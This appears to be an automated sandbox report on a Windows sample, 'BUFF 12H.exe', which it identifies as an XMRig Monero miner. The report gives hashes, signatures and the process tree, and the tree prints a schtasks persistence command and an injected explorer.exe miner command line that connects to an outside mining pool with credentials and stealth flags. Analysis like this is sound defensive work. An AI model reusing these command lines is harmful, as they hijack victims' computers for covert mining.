Overview

overview

10

Static

static

BUFF 12H.exe

windows7-x64

10

BUFF 12H.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    140s
  • max time network
    145s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    24-09-2022 17:27

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    BUFF 12H.exe

  • Size

    2.0MB

  • MD5

    44e757e4e2e6aba07865e5c42028f8c2

  • SHA1

    6399afb3b981c9ce457b81326dd3f79ddef081f0

  • SHA256

    5533c744f6f07c674ddf759b37acb92e6cecea77bdc9f9658166520f6c47de6f

  • SHA512

    e3da98f211f87bf6369eeb5245aea5a69bfa16e868c787f86e70776b96787059bb1fb0f22082f8653a2a257e50bd4f7d4a75fb17ea010e8a89862fd999485fbd

  • SSDEEP

    49152:h4XjTHzNmGid9ZiYioAykudfgzTlQNoYP1LZI2m0PZk+aJL0jRBtD8j:hGTNKJi5eTNoYPxdm+k+aJL4RB18j

Score
10/10
xmrigminer

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner payload 14 IoCs
    miner
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 37 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\BUFF 12H.exe
    "C:\Users\Admin\AppData\Local\Temp\BUFF 12H.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1336
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1740
      • C:\Windows\system32\schtasks.exe
        schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'
        3⤵
        • Creates scheduled task(s)
        PID:744
    • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
      "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
      2⤵
      • Executes dropped EXE
      PID:1880
    • C:\Users\Admin\AppData\Local\Temp\Services.exe
      "C:\Users\Admin\AppData\Local\Temp\Services.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:944
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:892
        • C:\Windows\system32\schtasks.exe
          schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'
          4⤵
          • Creates scheduled task(s)
          PID:1028
      • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        3⤵
        • Executes dropped EXE
        PID:1896
      • C:\Windows\explorer.exe
        C:\Windows\explorer.exe -B --coin=monero --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=7012628 --pass=Maximal2007 --cpu-max-threads-hint=30 --donate-level=5 --unam-idle-wait=1 --unam-idle-cpu=80 --unam-stealth
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1844

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1
T1053

Persistence

Scheduled Task

1
T1053

Privilege Escalation

Scheduled Task

1
T1053

Defense Evasion

Credential Access

Discovery

System Information Discovery

1
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

1
T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Services.exe
    Filesize

    2.0MB

    MD5

    44e757e4e2e6aba07865e5c42028f8c2

    SHA1

    6399afb3b981c9ce457b81326dd3f79ddef081f0

    SHA256

    5533c744f6f07c674ddf759b37acb92e6cecea77bdc9f9658166520f6c47de6f

    SHA512

    e3da98f211f87bf6369eeb5245aea5a69bfa16e868c787f86e70776b96787059bb1fb0f22082f8653a2a257e50bd4f7d4a75fb17ea010e8a89862fd999485fbd

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\Services.exe
    Filesize

    2.0MB

    MD5

    44e757e4e2e6aba07865e5c42028f8c2

    SHA1

    6399afb3b981c9ce457b81326dd3f79ddef081f0

    SHA256

    5533c744f6f07c674ddf759b37acb92e6cecea77bdc9f9658166520f6c47de6f

    SHA512

    e3da98f211f87bf6369eeb5245aea5a69bfa16e868c787f86e70776b96787059bb1fb0f22082f8653a2a257e50bd4f7d4a75fb17ea010e8a89862fd999485fbd

    Download Submit
  • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\WR64.sys
    Filesize

    14KB

    MD5

    0c0195c48b6b8582fa6f6373032118da

    SHA1

    d25340ae8e92a6d29f599fef426a2bc1b5217299

    SHA256

    11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5

    SHA512

    ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d

    Download Submit
  • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
    Filesize

    7KB

    MD5

    a214ff6a12ef03efe3d07c64343e31aa

    SHA1

    f740330ae29f91e4445234713aa2511ac7805e64

    SHA256

    0b91b9cf8d19525ad132d7ed65121cde198e31f3663fb473dcb41126cd3a186b

    SHA512

    781b6cefaee69b220e0274c4b55c81f62d206e23d0311bf77e01227b9ef049ab3be43311755e02699324d904b61c6ad292de2e1a30f1babd582a743d980010bd

    Download Submit
  • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
    Filesize

    7KB

    MD5

    a214ff6a12ef03efe3d07c64343e31aa

    SHA1

    f740330ae29f91e4445234713aa2511ac7805e64

    SHA256

    0b91b9cf8d19525ad132d7ed65121cde198e31f3663fb473dcb41126cd3a186b

    SHA512

    781b6cefaee69b220e0274c4b55c81f62d206e23d0311bf77e01227b9ef049ab3be43311755e02699324d904b61c6ad292de2e1a30f1babd582a743d980010bd

    Download Submit
  • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
    Filesize

    7KB

    MD5

    a214ff6a12ef03efe3d07c64343e31aa

    SHA1

    f740330ae29f91e4445234713aa2511ac7805e64

    SHA256

    0b91b9cf8d19525ad132d7ed65121cde198e31f3663fb473dcb41126cd3a186b

    SHA512

    781b6cefaee69b220e0274c4b55c81f62d206e23d0311bf77e01227b9ef049ab3be43311755e02699324d904b61c6ad292de2e1a30f1babd582a743d980010bd

    Download Submit
  • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
    Filesize

    7KB

    MD5

    a214ff6a12ef03efe3d07c64343e31aa

    SHA1

    f740330ae29f91e4445234713aa2511ac7805e64

    SHA256

    0b91b9cf8d19525ad132d7ed65121cde198e31f3663fb473dcb41126cd3a186b

    SHA512

    781b6cefaee69b220e0274c4b55c81f62d206e23d0311bf77e01227b9ef049ab3be43311755e02699324d904b61c6ad292de2e1a30f1babd582a743d980010bd

    Download Submit
  • \Users\Admin\AppData\Local\Temp\Services.exe
    Filesize

    2.0MB

    MD5

    44e757e4e2e6aba07865e5c42028f8c2

    SHA1

    6399afb3b981c9ce457b81326dd3f79ddef081f0

    SHA256

    5533c744f6f07c674ddf759b37acb92e6cecea77bdc9f9658166520f6c47de6f

    SHA512

    e3da98f211f87bf6369eeb5245aea5a69bfa16e868c787f86e70776b96787059bb1fb0f22082f8653a2a257e50bd4f7d4a75fb17ea010e8a89862fd999485fbd

    Download Submit
  • \Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
    Filesize

    7KB

    MD5

    a214ff6a12ef03efe3d07c64343e31aa

    SHA1

    f740330ae29f91e4445234713aa2511ac7805e64

    SHA256

    0b91b9cf8d19525ad132d7ed65121cde198e31f3663fb473dcb41126cd3a186b

    SHA512

    781b6cefaee69b220e0274c4b55c81f62d206e23d0311bf77e01227b9ef049ab3be43311755e02699324d904b61c6ad292de2e1a30f1babd582a743d980010bd

    Download Submit
  • \Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
    Filesize

    7KB

    MD5

    a214ff6a12ef03efe3d07c64343e31aa

    SHA1

    f740330ae29f91e4445234713aa2511ac7805e64

    SHA256

    0b91b9cf8d19525ad132d7ed65121cde198e31f3663fb473dcb41126cd3a186b

    SHA512

    781b6cefaee69b220e0274c4b55c81f62d206e23d0311bf77e01227b9ef049ab3be43311755e02699324d904b61c6ad292de2e1a30f1babd582a743d980010bd

    Download Submit
  • memory/744-57-0x0000000000000000-mapping.dmp
    Download
  • memory/892-69-0x0000000000000000-mapping.dmp
    Download
  • memory/944-77-0x00000000009F0000-0x00000000009FE000-memory.dmp
    Filesize

    56KB

    Download
  • memory/944-64-0x0000000000000000-mapping.dmp
    Download
  • memory/944-67-0x000000013F460000-0x000000013F668000-memory.dmp
    Filesize

    2.0MB

    Download
  • memory/1028-70-0x0000000000000000-mapping.dmp
    Download
  • memory/1336-54-0x000000013F0B0000-0x000000013F2B8000-memory.dmp
    Filesize

    2.0MB

    Download
  • memory/1336-55-0x000007FEFBB41000-0x000007FEFBB43000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1740-56-0x0000000000000000-mapping.dmp
    Download
  • memory/1844-88-0x0000000140000000-0x000000014074D000-memory.dmp
    Filesize

    7.3MB

    Download
  • memory/1844-93-0x0000000140000000-0x000000014074D000-memory.dmp
    Filesize

    7.3MB

    Download
  • memory/1844-107-0x0000000000000000-0x0000000001200000-memory.dmp
    Filesize

    18.0MB

    Download
  • memory/1844-106-0x0000000140000000-0x000000014074D000-memory.dmp
    Filesize

    7.3MB

    Download
  • memory/1844-78-0x0000000140000000-0x000000014074D000-memory.dmp
    Filesize

    7.3MB

    Download
  • memory/1844-79-0x0000000140000000-0x000000014074D000-memory.dmp
    Filesize

    7.3MB

    Download
  • memory/1844-81-0x0000000140000000-0x000000014074D000-memory.dmp
    Filesize

    7.3MB

    Download
  • memory/1844-83-0x0000000140000000-0x000000014074D000-memory.dmp
    Filesize

    7.3MB

    Download
  • memory/1844-85-0x0000000140000000-0x000000014074D000-memory.dmp
    Filesize

    7.3MB

    Download
  • memory/1844-87-0x0000000140000000-0x000000014074D000-memory.dmp
    Filesize

    7.3MB

    Download
  • memory/1844-105-0x0000000000000000-0x0000000001200000-memory.dmp
    Filesize

    18.0MB

    Download
  • memory/1844-89-0x0000000140000000-0x000000014074D000-memory.dmp
    Filesize

    7.3MB

    Download
  • memory/1844-91-0x0000000140000000-0x000000014074D000-memory.dmp
    Filesize

    7.3MB

    Download
  • memory/1844-104-0x0000000000000000-0x0000000001200000-memory.dmp
    Filesize

    18.0MB

    Download
  • memory/1844-95-0x0000000140000000-0x000000014074D000-memory.dmp
    Filesize

    7.3MB

    Download
  • memory/1844-94-0x0000000140000000-0x000000014074D000-memory.dmp
    Filesize

    7.3MB

    Download
  • memory/1844-98-0x00000001402E255C-mapping.dmp
    Download
  • memory/1844-97-0x0000000140000000-0x000000014074D000-memory.dmp
    Filesize

    7.3MB

    Download
  • memory/1844-100-0x0000000140000000-0x000000014074D000-memory.dmp
    Filesize

    7.3MB

    Download
  • memory/1844-101-0x0000000000280000-0x0000000000294000-memory.dmp
    Filesize

    80KB

    Download
  • memory/1844-102-0x0000000140000000-0x000000014074D000-memory.dmp
    Filesize

    7.3MB

    Download
  • memory/1844-103-0x0000000000000000-0x0000000001200000-memory.dmp
    Filesize

    18.0MB

    Download
  • memory/1880-62-0x000000013FE90000-0x000000013FE96000-memory.dmp
    Filesize

    24KB

    Download
  • memory/1880-59-0x0000000000000000-mapping.dmp
    Download
  • memory/1896-75-0x000000013FBE0000-0x000000013FBE6000-memory.dmp
    Filesize

    24KB

    Download
  • memory/1896-72-0x0000000000000000-mapping.dmp
    Download